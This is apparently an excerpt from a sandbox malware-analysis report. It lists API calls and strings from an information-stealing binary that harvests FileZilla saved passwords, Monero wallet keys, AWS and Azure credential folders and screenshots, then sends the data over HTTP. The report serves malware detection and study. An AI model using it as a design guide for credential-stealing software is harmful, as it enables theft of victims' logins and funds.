                            • lstrcat.KERNEL32(?,00000000), ref: 000E0746
                            • lstrcat.KERNEL32(?,000F1780), ref: 000E0755
                            • lstrcat.KERNEL32(?,password: ), ref: 000E0764
                            • lstrcat.KERNEL32(?,00000000), ref: 000E0777
                            • lstrcat.KERNEL32(?,000F1790), ref: 000E0786
                            • lstrcat.KERNEL32(?,000F1794), ref: 000E0795
                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000F0DB7), ref: 000E07EE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 1942843190-555421843
                            • Opcode ID: fca194ce6e5a6e0ebde2c49fc53b310e61ee5934f34d5d06aa1c033cc04c60a9
                            • Instruction ID: 06c3fd0304c9d245fcf0a9c3fddb9c81fe3754376017cf670c178fba846c6eab
                            • Opcode Fuzzy Hash: fca194ce6e5a6e0ebde2c49fc53b310e61ee5934f34d5d06aa1c033cc04c60a9
                            • Instruction Fuzzy Hash: A0D12D72E04248AFDB04EBE1DD96EEE7379AF1A300F408554F206B6092DF74BA44CB61
                            Function 000D59B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                              • Part of subcall function 000D4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000D4889
                              • Part of subcall function 000D4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 000D4899
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000D5A48
                            • StrCmpCA.SHLWAPI(?,00D4E898), ref: 000D5A63
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000D5BE3
                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00D4E768,00000000,?,00D4A8D0,00000000,?,000F1B4C), ref: 000D5EC1
                            • lstrlen.KERNEL32(00000000), ref: 000D5ED2
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 000D5EE3
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000D5EEA
                            • lstrlen.KERNEL32(00000000), ref: 000D5EFF
                            • lstrlen.KERNEL32(00000000), ref: 000D5F28
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 000D5F41
                            • lstrlen.KERNEL32(00000000,?,?), ref: 000D5F6B
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 000D5F7F
                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 000D5F9C
                            • InternetCloseHandle.WININET(00000000), ref: 000D6000
                            • InternetCloseHandle.WININET(00000000), ref: 000D600D
                            • HttpOpenRequestA.WININET(00000000,00D4E7B8,?,00D4DE70,00000000,00000000,00400100,00000000), ref: 000D5C48
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                            • InternetCloseHandle.WININET(00000000), ref: 000D6017
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 874700897-2180234286
                            • Opcode ID: f75553cabb5de87e096e8183e2a23f135286e6171f5165157abe3c3da8d01a9f
                            • Instruction ID: e7aa12c291705691cfe4e1fff03b9d4e98e439cbbcb6b43e2dfcf6c86a971aca
                            • Opcode Fuzzy Hash: f75553cabb5de87e096e8183e2a23f135286e6171f5165157abe3c3da8d01a9f
                            • Instruction Fuzzy Hash: 7412ED72A20158AFCB15EBA1DCA5FEEB379BF19700F114199B10676193DF703A48CB61
                            Function 000DCFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000E8CF0: GetSystemTime.KERNEL32(000F0E1B,00D4A870,000F05B6,?,?,000D13F9,?,0000001A,000F0E1B,00000000,?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000E8D16
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000DD083
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 000DD1C7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000DD1CE
                            • lstrcat.KERNEL32(?,00000000), ref: 000DD308
                            • lstrcat.KERNEL32(?,000F1570), ref: 000DD317
                            • lstrcat.KERNEL32(?,00000000), ref: 000DD32A
                            • lstrcat.KERNEL32(?,000F1574), ref: 000DD339
                            • lstrcat.KERNEL32(?,00000000), ref: 000DD34C
                            • lstrcat.KERNEL32(?,000F1578), ref: 000DD35B
                            • lstrcat.KERNEL32(?,00000000), ref: 000DD36E
                            • lstrcat.KERNEL32(?,000F157C), ref: 000DD37D
                            • lstrcat.KERNEL32(?,00000000), ref: 000DD390
                            • lstrcat.KERNEL32(?,000F1580), ref: 000DD39F
                            • lstrcat.KERNEL32(?,00000000), ref: 000DD3B2
                            • lstrcat.KERNEL32(?,000F1584), ref: 000DD3C1
                            • lstrcat.KERNEL32(?,00000000), ref: 000DD3D4
                            • lstrcat.KERNEL32(?,000F1588), ref: 000DD3E3
                              • Part of subcall function 000EAB30: lstrlen.KERNEL32(000D4F55,?,?,000D4F55,000F0DDF), ref: 000EAB3B
                              • Part of subcall function 000EAB30: lstrcpy.KERNEL32(000F0DDF,00000000), ref: 000EAB95
                            • lstrlen.KERNEL32(?), ref: 000DD42A
                            • lstrlen.KERNEL32(?), ref: 000DD439
                              • Part of subcall function 000EAD80: StrCmpCA.SHLWAPI(00000000,000F1568,000DD2A2,000F1568,00000000), ref: 000EAD9F
                            • DeleteFileA.KERNEL32(00000000), ref: 000DD4B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                            • String ID:
                            • API String ID: 1956182324-0
                            • Opcode ID: 0b9e9e5303e49f83a33bb7d75c4f6c828a9dc159c8d41744816f028ec652d96a
                            • Instruction ID: a746241cd4319653d21cc3bb4bf271285ab226ecf1d41e2691d0638cfe6bcde0
                            • Opcode Fuzzy Hash: 0b9e9e5303e49f83a33bb7d75c4f6c828a9dc159c8d41744816f028ec652d96a
                            • Instruction Fuzzy Hash: 7DE13E71E10148AFCB05EBA1DDA6EEE737DAF1A301F114559F106761A2DF31BA08CB62
                            Function 000DCA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00D4CEB8,00000000,?,000F1544,00000000,?,?), ref: 000DCB6C
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 000DCB89
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 000DCB95
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 000DCBA8
                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 000DCBD9
                            • StrStrA.SHLWAPI(?,00D4CF90,000F0B56), ref: 000DCBF7
                            • StrStrA.SHLWAPI(00000000,00D4D0E0), ref: 000DCC1E
                            • StrStrA.SHLWAPI(?,00D4D960,00000000,?,000F1550,00000000,?,00000000,00000000,?,00D49068,00000000,?,000F154C,00000000,?), ref: 000DCDA2
                            • StrStrA.SHLWAPI(00000000,00D4D8E0), ref: 000DCDB9
                              • Part of subcall function 000DC920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 000DC971
                              • Part of subcall function 000DC920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 000DC97C
                            • StrStrA.SHLWAPI(?,00D4D8E0,00000000,?,000F1554,00000000,?,00000000,00D49038), ref: 000DCE5A
                            • StrStrA.SHLWAPI(00000000,00D49158), ref: 000DCE71
                              • Part of subcall function 000DC920: lstrcat.KERNEL32(?,000F0B47), ref: 000DCA43
                              • Part of subcall function 000DC920: lstrcat.KERNEL32(?,000F0B4B), ref: 000DCA57
                              • Part of subcall function 000DC920: lstrcat.KERNEL32(?,000F0B4E), ref: 000DCA78
                            • lstrlen.KERNEL32(00000000), ref: 000DCF44
                            • CloseHandle.KERNEL32(00000000), ref: 000DCF9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                            • String ID:
                            • API String ID: 3744635739-3916222277
                            • Opcode ID: b1470e2242fb4e5f224f76cdfcee76ed6c885578692a24b1511cf9568469785f
                            • Instruction ID: f2a47e1e9681595e19f758c3cc2978a90c6801a626daa779e42b25700d9b3d0b
                            • Opcode Fuzzy Hash: b1470e2242fb4e5f224f76cdfcee76ed6c885578692a24b1511cf9568469785f
                            • Instruction Fuzzy Hash: ECE1C772E10148AFCB15EBA5DCA2FEEB779AF59300F014199F10676193EB307A49CB61
                            Function 000E84B0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 196registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            • RegOpenKeyExA.ADVAPI32(00000000,00D4B508,00000000,00020019,00000000,000F05BE), ref: 000E8534
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 000E85B6
                            • wsprintfA.USER32 ref: 000E85E9
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 000E860B
                            • RegCloseKey.ADVAPI32(00000000), ref: 000E861C
                            • RegCloseKey.ADVAPI32(00000000), ref: 000E8629
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                            • String ID: - $%s\%s
                            • API String ID: 3246050789-1643714437
                            • Opcode ID: dfe7fe80346fcc544ee3921ec5843524da3eced6c7ffdd53062a5d1c13eb5066
                            • Instruction ID: ed8925c111eb96709d4e2964e1282a60b73940d0b24d8ee39c29693a14c82f2a
                            • Opcode Fuzzy Hash: dfe7fe80346fcc544ee3921ec5843524da3eced6c7ffdd53062a5d1c13eb5066
                            • Instruction Fuzzy Hash: 9D811B71A11158AFDB24DB55CD95FEAB7B8BF49700F1086D8F209A6181DF70AB84CFA0
                            Function 000E4FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000E8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000E8F9B
                            • lstrcat.KERNEL32(?,00000000), ref: 000E5000
                            • lstrcat.KERNEL32(?,\.azure\), ref: 000E501D
                              • Part of subcall function 000E4B60: wsprintfA.USER32 ref: 000E4B7C
                              • Part of subcall function 000E4B60: FindFirstFileA.KERNEL32(?,?), ref: 000E4B93
                            • lstrcat.KERNEL32(?,00000000), ref: 000E508C
                            • lstrcat.KERNEL32(?,\.aws\), ref: 000E50A9
                              • Part of subcall function 000E4B60: StrCmpCA.SHLWAPI(?,000F0FC4), ref: 000E4BC1
                              • Part of subcall function 000E4B60: StrCmpCA.SHLWAPI(?,000F0FC8), ref: 000E4BD7
                              • Part of subcall function 000E4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 000E4DCD
                              • Part of subcall function 000E4B60: FindClose.KERNEL32(000000FF), ref: 000E4DE2
                            • lstrcat.KERNEL32(?,00000000), ref: 000E5118
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 000E5135
                              • Part of subcall function 000E4B60: wsprintfA.USER32 ref: 000E4C00
                              • Part of subcall function 000E4B60: StrCmpCA.SHLWAPI(?,000F08D3), ref: 000E4C15
                              • Part of subcall function 000E4B60: wsprintfA.USER32 ref: 000E4C32
                              • Part of subcall function 000E4B60: PathMatchSpecA.SHLWAPI(?,?), ref: 000E4C6E
                              • Part of subcall function 000E4B60: lstrcat.KERNEL32(?,00D4E918), ref: 000E4C9A
                              • Part of subcall function 000E4B60: lstrcat.KERNEL32(?,000F0FE0), ref: 000E4CAC
                              • Part of subcall function 000E4B60: lstrcat.KERNEL32(?,?), ref: 000E4CC0
                              • Part of subcall function 000E4B60: lstrcat.KERNEL32(?,000F0FE4), ref: 000E4CD2
                              • Part of subcall function 000E4B60: lstrcat.KERNEL32(?,?), ref: 000E4CE6
                              • Part of subcall function 000E4B60: CopyFileA.KERNEL32(?,?,00000001), ref: 000E4CFC
                              • Part of subcall function 000E4B60: DeleteFileA.KERNEL32(?), ref: 000E4D81
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 949356159-974132213
                            • Opcode ID: 2f0f2a5cbbd2643487b74e37d7c8c7f4e6bbaa730214e350ff74aea762c7c30c
                            • Instruction ID: 20f8a73e33ed18dc85f763a75615f0583a2220603985320289b45ea89286afa9
                            • Opcode Fuzzy Hash: 2f0f2a5cbbd2643487b74e37d7c8c7f4e6bbaa730214e350ff74aea762c7c30c
                            • Instruction Fuzzy Hash: 084185BAA44208ABDB10E770EC97FED733C5B65704F004994B749690C2EEF567C88B92
                            Function 000E91A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                            Download Yara Rule
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 000E91FC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateGlobalStream
                            • String ID: image/jpeg
                            • API String ID: 2244384528-3785015651
                            • Opcode ID: a5707631c13f9d99e56a4ff082a673c4fb205d8eb55c39f0d9e1fd75335ffec3
                            • Instruction ID: cdb27bbe00ac77de7c6dc003a8e08a5176aecde48c842732c953d236ac7e9ae0
                            • Opcode Fuzzy Hash: a5707631c13f9d99e56a4ff082a673c4fb205d8eb55c39f0d9e1fd75335ffec3
                            • Instruction Fuzzy Hash: 5871D875A10208AFDB14DFE5DC89FEEB7B9BB49700F108509F616A7295DB34AA04CB60
                            Function 000E3080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            • ShellExecuteEx.SHELL32(0000003C), ref: 000E3415
